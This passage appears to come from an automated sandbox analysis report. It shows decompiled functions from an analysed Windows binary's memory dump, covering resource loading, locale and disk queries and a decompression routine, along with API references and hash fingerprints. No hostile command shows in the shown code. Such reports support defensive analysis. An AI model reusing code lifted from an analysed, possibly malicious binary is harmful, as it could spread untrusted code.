                                                                                    • SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
                                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
                                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                    • Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
                                                                                    • Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
                                                                                    • Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040A4CC, Relevance: 4.6, APIs: 3, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 71%
                                                                                    			E0040A4CC(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				short _v182;
				short _v352;
				char _v356;
				char _v360;
				char _v364;
				int _t58;
				signed int _t61;
				intOrPtr _t70;
				signed short _t80;
				void* _t83;
				void* _t85;
				void* _t86;

				_t77 = __edi;
				_push(__edi);
				_v356 = 0;
				_v360 = 0;
				_v364 = 0;
				_v8 = __edx;
				_t80 = __eax;
				_push(_t83);
				_push(0x40a631);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83 + 0xfffffe98;
				E00407A20(_v8);
				_t85 = _t80 -  *0x4b7a08; // 0x404
				if(_t85 >= 0) {
					_t86 = _t80 -  *0x4b7c08; // 0x7c68
					if(_t86 <= 0) {
						_t77 = 0x40;
						_v12 = 0;
						if(0x40 >= _v12) {
							do {
								_t61 = _t77 + _v12 >> 1;
								if(_t80 >=  *((intOrPtr*)(0x4b7a08 + _t61 * 8))) {
									__eflags = _t80 -  *((intOrPtr*)(0x4b7a08 + _t61 * 8));
									if(__eflags <= 0) {
										E0040A3EC( *((intOrPtr*)(0x4b7a0c + _t61 * 8)), _t61, _v8, _t77, _t80, __eflags);
									} else {
										_v12 = _t61 + 1;
										goto L8;
									}
								} else {
									_t77 = _t61 - 1;
									goto L8;
								}
								goto L9;
								L8:
							} while (_t77 >= _v12);
						}
					}
				}
				L9:
				if( *_v8 == 0 && IsValidLocale(_t80 & 0x0000ffff, 2) != 0) {
					_t58 = _t80 & 0x0000ffff;
					GetLocaleInfoW(_t58, 0x59,  &_v182, 0x55);
					GetLocaleInfoW(_t58, 0x5a,  &_v352, 0x55);
					E0040858C( &_v356, 0x55,  &_v182);
					_push(_v356);
					_push(0x40a64c);
					E0040858C( &_v360, 0x55,  &_v352);
					_push(_v360);
					_push(E0040A65C);
					E0040858C( &_v364, 0x55,  &_v182);
					_push(_v364);
					E004087C4(_v8, _t58, 5, _t77, _t80);
				}
				_pop(_t70);
				 *[fs:eax] = _t70;
				_push(E0040A638);
				return E00407A80( &_v364, 3);
			}

















                                                                                    0x0040a4cc
                                                                                    0x0040a4d7
                                                                                    0x0040a4da
                                                                                    0x0040a4e0
                                                                                    0x0040a4e6
                                                                                    0x0040a4ec
                                                                                    0x0040a4ef
                                                                                    0x0040a4f3
                                                                                    0x0040a4f4
                                                                                    0x0040a4f9
                                                                                    0x0040a4fc
                                                                                    0x0040a502
                                                                                    0x0040a507
                                                                                    0x0040a50e
                                                                                    0x0040a510
                                                                                    0x0040a517
                                                                                    0x0040a519
                                                                                    0x0040a520
                                                                                    0x0040a526
                                                                                    0x0040a528
                                                                                    0x0040a52d
                                                                                    0x0040a537
                                                                                    0x0040a53e
                                                                                    0x0040a546
                                                                                    0x0040a558
                                                                                    0x0040a548
                                                                                    0x0040a549
                                                                                    0x00000000
                                                                                    0x0040a549
                                                                                    0x0040a539
                                                                                    0x0040a53b
                                                                                    0x00000000
                                                                                    0x0040a53b
                                                                                    0x00000000
                                                                                    0x0040a55f
                                                                                    0x0040a55f
                                                                                    0x0040a528
                                                                                    0x0040a526
                                                                                    0x0040a517
                                                                                    0x0040a564
                                                                                    0x0040a56a
                                                                                    0x0040a58e
                                                                                    0x0040a592
                                                                                    0x0040a5a3
                                                                                    0x0040a5b9
                                                                                    0x0040a5be
                                                                                    0x0040a5c4
                                                                                    0x0040a5da
                                                                                    0x0040a5df
                                                                                    0x0040a5e5
                                                                                    0x0040a5fb
                                                                                    0x0040a600
                                                                                    0x0040a60e
                                                                                    0x0040a60e
                                                                                    0x0040a615
                                                                                    0x0040a618
                                                                                    0x0040a61b
                                                                                    0x0040a630

                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A576
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A592
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,0000005A,?,00000055,00000000,00000059,?,00000055,?,00000002,00000000,0040A631,?,004162BC,?,00000000), ref: 0040A5A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Locale$Info$Valid
                                                                                    • String ID:
                                                                                    • API String ID: 1826331170-0
                                                                                    • Opcode ID: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                    • Instruction ID: 92a11a0233c3b219485afac9e49f2dea99407596d6f7a83949ef3a6145fdf69e
                                                                                    • Opcode Fuzzy Hash: 62325bdbcd9f8bf22caa424e6d98428fadf2f4ef7d6ad95b5286de9b97f55654
                                                                                    • Instruction Fuzzy Hash: 3831AE70A00308ABDF20DB64DD81BDEBBB9FB48701F5005BBA508B32D1D6395E90CE1A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041A4DC, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0041A4DC(WCHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				WCHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceW(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E004095A8(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E004095A8(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

















                                                                                    0x0041a4e3
                                                                                    0x0041a4e8
                                                                                    0x0041a4ea
                                                                                    0x0041a4ea
                                                                                    0x0041a4fd
                                                                                    0x0041a50c
                                                                                    0x0041a50f
                                                                                    0x0041a51c
                                                                                    0x0041a51f
                                                                                    0x0041a524
                                                                                    0x0041a527
                                                                                    0x0041a529
                                                                                    0x0041a536
                                                                                    0x0041a539
                                                                                    0x0041a53e
                                                                                    0x0041a541
                                                                                    0x0041a543
                                                                                    0x0041a54c

                                                                                    APIs
                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?), ref: 0041A4FD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DiskFreeSpace
                                                                                    • String ID:
                                                                                    • API String ID: 1705453755-0
                                                                                    • Opcode ID: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                    • Instruction ID: 14c90aad059d6341cd8fbca9d1c94cd423dd62e4f1f0ed92fc39ecac232c4210
                                                                                    • Opcode Fuzzy Hash: 35fab30d3ed47bb79bc7b5801678cd6b626cb6661b26d0a6d4a2aa78d0844cce
                                                                                    • Instruction Fuzzy Hash: 7711C0B5A01209AFDB04CF9ACD819EFB7F9EFC8304B14C569A505E7255E6319E018B94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E034, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0041E034(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				short _v516;
				void* __ebp;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoW(__eax, __edx,  &_v516, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00407E00(_t10, _t18);
				}
				return E00407BA8(_t10, _t5 - 1,  &_v516, _t19);
			}








                                                                                    0x0041e03f
                                                                                    0x0041e041
                                                                                    0x0041e052
                                                                                    0x0041e057
                                                                                    0x0041e059
                                                                                    0x00000000
                                                                                    0x0041e071
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                    • Instruction ID: c90943d4e22265a1f7ecf9aede9ac9faa011377f579ac525cbc4109061889d1c
                                                                                    • Opcode Fuzzy Hash: d1249f9bfb9152180de995f4510b089303b0330b3d36e5e1fa950d916a740853
                                                                                    • Instruction Fuzzy Hash: C7E09235B0421427E314A55A9C86AE7725D9B48340F40457FBD05D7382EDB9AE8042E9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041E080, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 79%
                                                                                    			E0041E080(int __eax, signed int __ecx, int __edx) {
				short _v16;
				signed int _t5;
				signed int _t10;

				_push(__ecx);
				_t10 = __ecx;
				if(GetLocaleInfoW(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t10;
				} else {
					_t5 = _v16 & 0x0000ffff;
				}
				return _t5;
			}






                                                                                    0x0041e083
                                                                                    0x0041e084
                                                                                    0x0041e09a
                                                                                    0x0041e0a2
                                                                                    0x0041e09c
                                                                                    0x0041e09c
                                                                                    0x0041e09c
                                                                                    0x0041e0a8

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                                    • Instruction ID: 961adf842b5e4829a7f1cb68f4be235500f18d0b61d537998bbd462cca006134
                                                                                    • Opcode Fuzzy Hash: c2a2e253f202cad765f8f9b35123567cb33a3e9031303696ff7b3b42dc5ba059
                                                                                    • Instruction Fuzzy Hash: 45D05EBA31923476E214915B6E85DB75ADCCBC87A2F14483BBE4CC6241D2A4CC46A275
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AF218, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004AF218(signed int __eax) {
				short _v8;
				signed int _t6;

				_t6 = GetLocaleInfoW(__eax & 0x0000ffff, 0x20001004,  &_v8, 2);
				if(_t6 <= 0) {
					return _t6 | 0xffffffff;
				}
				return _v8;
			}





                                                                                    0x004af22e
                                                                                    0x004af235
                                                                                    0x00000000
                                                                                    0x004af23c
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,004AF318), ref: 004AF22E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                                    • Instruction ID: 3cbbb47bc5e3852376f83ef88ad8e7e21f22c900a58d153b56eed97a123c5839
                                                                                    • Opcode Fuzzy Hash: 91ef75d91c3bf0fbfb4c903f00eadddcc0e9dd42321a82c412adf8826a4a964a
                                                                                    • Instruction Fuzzy Hash: E8D0A5F55442087DF504C1DA5D82FB673DCD705374F500767F654C52C1D567EE015219
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0041C3D8, Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0041C3D8() {
				struct _SYSTEMTIME* _t2;

				GetLocalTime(_t2);
				return _t2->wYear & 0x0000ffff;
			}




                                                                                    0x0041c3dc
                                                                                    0x0041c3e8

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: LocalTime
                                                                                    • String ID:
                                                                                    • API String ID: 481472006-0
                                                                                    • Opcode ID: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                                    • Instruction ID: 79eafb11b28f80ce797d6e9fe134e5764476c7cb5db39d72cf417c4d7be8b418
                                                                                    • Opcode Fuzzy Hash: 2bbd9f916a85fd19aaf3e135de3c6f6031220cebfdbc254b78c71648618a48a1
                                                                                    • Instruction Fuzzy Hash: DAA0122080582011D140331A0C0313530405900620FC40F55BCF8542D1E93D013440D7
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004255DC, Relevance: .5, Instructions: 545COMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004255DC(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				char _v25;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				char _v64;
				char* _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v89;
				char _v96;
				signed int _v100;
				signed int _v104;
				short* _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				char _v136;
				signed int _t370;
				void* _t375;
				signed int _t377;
				signed int _t381;
				signed int _t389;
				signed int _t395;
				signed int _t411;
				intOrPtr _t422;
				signed int _t426;
				signed int _t435;
				void* _t448;
				signed int _t458;
				char _t460;
				signed int _t474;
				char* _t503;
				signed int _t508;
				signed int _t616;
				signed int _t617;
				signed int _t618;
				signed int _t622;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 =  *((intOrPtr*)(_v8 + 0x10));
				_v24 = 0;
				_v32 = (1 <<  *(_v8 + 8)) - 1;
				_v36 = (1 <<  *(_v8 + 4)) - 1;
				_v40 =  *_v8;
				_t617 =  *((intOrPtr*)(_v8 + 0x34));
				_t474 =  *(_v8 + 0x44);
				_v44 =  *((intOrPtr*)(_v8 + 0x38));
				_v48 =  *((intOrPtr*)(_v8 + 0x3c));
				_v52 =  *((intOrPtr*)(_v8 + 0x40));
				_v56 =  *((intOrPtr*)(_v8 + 0x48));
				_v60 =  *((intOrPtr*)(_v8 + 0x2c));
				_v64 =  *((intOrPtr*)(_v8 + 0x30));
				_v68 =  *((intOrPtr*)(_v8 + 0x1c));
				_v72 =  *((intOrPtr*)(_v8 + 0xc));
				_t616 =  *((intOrPtr*)(_v8 + 0x28));
				_v128 =  *((intOrPtr*)(_v8 + 0x20));
				_v124 =  *((intOrPtr*)(_v8 + 0x24));
				_v120 = _v12;
				_v136 =  *((intOrPtr*)(_v8 + 0x14));
				_v132 =  *((intOrPtr*)(_v8 + 0x18));
				 *_a4 = 0;
				if(_v56 == 0xffffffff) {
					return 0;
				}
				__eflags = _v72;
				if(_v72 == 0) {
					_v68 =  &_v76;
					_v72 = 1;
					_v76 =  *((intOrPtr*)(_v8 + 0x4c));
				}
				__eflags = _v56 - 0xfffffffe;
				if(_v56 != 0xfffffffe) {
					L12:
					_v108 = _v16 + _v24;
					while(1) {
						__eflags = _v56;
						if(_v56 == 0) {
							break;
						}
						__eflags = _v24 - _a8;
						if(_v24 < _a8) {
							_t458 = _t616 - _t617;
							__eflags = _t458 - _v72;
							if(_t458 >= _v72) {
								_t458 = _t458 + _v72;
								__eflags = _t458;
							}
							_t460 =  *((intOrPtr*)(_v68 + _t458));
							 *((char*)(_v68 + _t616)) = _t460;
							 *_v108 = _t460;
							_v24 = _v24 + 1;
							_v108 = _v108 + 1;
							_t616 = _t616 + 1;
							__eflags = _t616 - _v72;
							if(_t616 == _v72) {
								_t616 = 0;
								__eflags = 0;
							}
							_t116 =  &_v56;
							 *_t116 = _v56 - 1;
							__eflags =  *_t116;
							continue;
						}
						break;
					}
					__eflags = _t616;
					if(_t616 != 0) {
						_v25 =  *((intOrPtr*)(_v68 + _t616 - 1));
					} else {
						_v25 =  *((intOrPtr*)(_v68 + _v72 - 1));
					}
					__eflags = 0;
					_v116 = 0;
					_v112 = 0;
					while(1) {
						L24:
						_v108 = _v16 + _v24;
						__eflags = _v24 - _a8;
						if(_v24 >= _a8) {
							break;
						} else {
							goto L25;
						}
						while(1) {
							L25:
							_v88 = _v24 + _v60 & _v32;
							__eflags = _v116;
							if(_v116 != 0) {
								break;
							}
							__eflags = _v112;
							if(_v112 == 0) {
								_t370 = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88,  &_v136);
								__eflags = _t370;
								if(_t370 != 0) {
									_t375 = E00425334(_t474 + _t474 + _v20 + 0x180,  &_v136);
									__eflags = _t375 != 1;
									if(_t375 != 1) {
										_v52 = _v48;
										_v48 = _v44;
										_v44 = _t617;
										__eflags = _t474 - 7;
										if(__eflags >= 0) {
											_t377 = 0xa;
										} else {
											_t377 = 7;
										}
										_t474 = _t377;
										_v56 = E004254E4(_v20 + 0x664, _v88,  &_v136, __eflags);
										_t503 =  &_v136;
										__eflags = _v56 - 4;
										if(_v56 >= 4) {
											_t381 = 3;
										} else {
											_t381 = _v56;
										}
										_v100 = E004253BC((_t381 << 6) + (_t381 << 6) + _v20 + 0x360, _t503, 6);
										__eflags = _v100 - 4;
										if(_v100 < 4) {
											_t618 = _v100;
										} else {
											_v104 = (_v100 >> 1) - 1;
											_t524 = _v104;
											_t622 = (_v100 & 0x00000001 | 0x00000002) << _v104;
											__eflags = _v100 - 0xe;
											if(_v100 >= 0xe) {
												_t395 = E004252D4( &_v136, _t524, _v104 + 0xfffffffc);
												_t618 = _t622 + (_t395 << 4) + E00425400(_v20 + 0x644,  &_v136, 4);
											} else {
												_t618 = _t622 + E00425400(_t622 + _t622 + _v20 + 0x560 - _v100 + _v100 + 0xfffffffe,  &_v136, _v104);
											}
										}
										_t617 = _t618 + 1;
										__eflags = _t617;
										if(_t617 != 0) {
											L82:
											_v56 = _v56 + 2;
											__eflags = _t617 - _v64;
											if(_t617 <= _v64) {
												__eflags = _v72 - _v64 - _v56;
												if(_v72 - _v64 <= _v56) {
													_v64 = _v72;
												} else {
													_v64 = _v64 + _v56;
												}
												while(1) {
													_t389 = _t616 - _t617;
													__eflags = _t389 - _v72;
													if(_t389 >= _v72) {
														_t389 = _t389 + _v72;
														__eflags = _t389;
													}
													_v25 =  *((intOrPtr*)(_v68 + _t389));
													 *((char*)(_v68 + _t616)) = _v25;
													_t616 = _t616 + 1;
													__eflags = _t616 - _v72;
													if(_t616 == _v72) {
														_t616 = 0;
														__eflags = 0;
													}
													_v56 = _v56 - 1;
													 *_v108 = _v25;
													_v24 = _v24 + 1;
													_v108 = _v108 + 1;
													__eflags = _v56;
													if(_v56 == 0) {
														break;
													}
													__eflags = _v24 - _a8;
													if(_v24 < _a8) {
														continue;
													}
													break;
												}
												L93:
												__eflags = _v24 - _a8;
												if(_v24 < _a8) {
													continue;
												}
												goto L94;
											}
											return 1;
										} else {
											_v56 = 0xffffffff;
											goto L94;
										}
									}
									_t411 = E00425334(_t474 + _t474 + _v20 + 0x198,  &_v136);
									__eflags = _t411;
									if(_t411 != 0) {
										__eflags = E00425334(_t474 + _t474 + _v20 + 0x1b0,  &_v136);
										if(__eflags != 0) {
											__eflags = E00425334(_t474 + _t474 + _v20 + 0x1c8,  &_v136);
											if(__eflags != 0) {
												_t422 = _v52;
												_v52 = _v48;
											} else {
												_t422 = _v48;
											}
											_v48 = _v44;
										} else {
											_t422 = _v44;
										}
										_v44 = _t617;
										_t617 = _t422;
										L65:
										_v56 = E004254E4(_v20 + 0xa68, _v88,  &_v136, __eflags);
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t426 = 0xb;
										} else {
											_t426 = 8;
										}
										_t474 = _t426;
										goto L82;
									}
									__eflags = E00425334((_t474 << 4) + (_t474 << 4) + _v20 + _v88 + _v88 + 0x1e0,  &_v136);
									if(__eflags != 0) {
										goto L65;
									}
									__eflags = _v64;
									if(_v64 != 0) {
										__eflags = _t474 - 7;
										if(_t474 >= 7) {
											_t508 = 0xb;
										} else {
											_t508 = 9;
										}
										_t474 = _t508;
										_t435 = _t616 - _t617;
										__eflags = _t435 - _v72;
										if(_t435 >= _v72) {
											_t435 = _t435 + _v72;
											__eflags = _t435;
										}
										_v25 =  *((intOrPtr*)(_v68 + _t435));
										 *((char*)(_v68 + _t616)) = _v25;
										_t616 = _t616 + 1;
										__eflags = _t616 - _v72;
										if(_t616 == _v72) {
											_t616 = 0;
											__eflags = 0;
										}
										 *_v108 = _v25;
										_v24 = _v24 + 1;
										__eflags = _v64 - _v72;
										if(_v64 < _v72) {
											_v64 = _v64 + 1;
										}
										goto L24;
									}
									return 1;
								}
								_t448 = (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) + (((_v24 + _v60 & _v36) << _v40) + (0 >> 8 - _v40) << 8) * 2 + _v20 + 0xe6c;
								__eflags = _t474 - 7;
								if(__eflags < 0) {
									_v25 = E00425444(_t448,  &_v136, __eflags);
								} else {
									_v96 = _t616 - _t617;
									__eflags = _v96 - _v72;
									if(__eflags >= 0) {
										_t161 =  &_v96;
										 *_t161 = _v96 + _v72;
										__eflags =  *_t161;
									}
									_v89 =  *((intOrPtr*)(_v68 + _v96));
									_v25 = E00425470(_t448, _v89,  &_v136, __eflags);
								}
								 *_v108 = _v25;
								_v24 = _v24 + 1;
								_v108 = _v108 + 1;
								__eflags = _v64 - _v72;
								if(_v64 < _v72) {
									_t180 =  &_v64;
									 *_t180 = _v64 + 1;
									__eflags =  *_t180;
								}
								 *((char*)(_v68 + _t616)) = _v25;
								_t616 = _t616 + 1;
								__eflags = _t616 - _v72;
								if(_t616 == _v72) {
									_t616 = 0;
									__eflags = 0;
								}
								__eflags = _t474 - 4;
								if(_t474 >= 4) {
									__eflags = _t474 - 0xa;
									if(_t474 >= 0xa) {
										_t474 = _t474 - 6;
									} else {
										_t474 = _t474 - 3;
									}
								} else {
									_t474 = 0;
								}
								goto L93;
							}
							return 1;
						}
						return _v116;
					}
					L94:
					 *((intOrPtr*)(_v8 + 0x20)) = _v128;
					 *((intOrPtr*)(_v8 + 0x24)) = _v124;
					 *((intOrPtr*)(_v8 + 0x28)) = _t616;
					 *((intOrPtr*)(_v8 + 0x2c)) = _v60 + _v24;
					 *((intOrPtr*)(_v8 + 0x30)) = _v64;
					 *((intOrPtr*)(_v8 + 0x34)) = _t617;
					 *((intOrPtr*)(_v8 + 0x38)) = _v44;
					 *((intOrPtr*)(_v8 + 0x3c)) = _v48;
					 *((intOrPtr*)(_v8 + 0x40)) = _v52;
					 *(_v8 + 0x44) = _t474;
					 *((intOrPtr*)(_v8 + 0x48)) = _v56;
					 *((char*)(_v8 + 0x4c)) = _v76;
					 *((intOrPtr*)(_v8 + 0x14)) = _v136;
					 *((intOrPtr*)(_v8 + 0x18)) = _v132;
					 *_a4 = _v24;
					__eflags = 0;
					return 0;
				}
				_v80 = (0x300 <<  *(_v8 + 4) + _v40) + 0x736;
				_v84 = 0;
				_v108 = _v20;
				__eflags = _v84 - _v80;
				if(_v84 >= _v80) {
					L7:
					_v52 = 1;
					_v48 = 1;
					_v44 = 1;
					_t617 = 1;
